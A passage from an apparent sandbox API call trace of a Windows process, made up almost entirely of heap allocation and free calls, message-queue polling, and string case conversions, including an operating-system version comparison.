Size=0x20) returned 0x24b3c90 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.871] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.872] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0257.872] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0257.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.874] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0257.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.875] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.876] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.876] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0257.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.878] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.878] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0257.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.879] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0257.879] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0257.879] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.880] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0257.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: 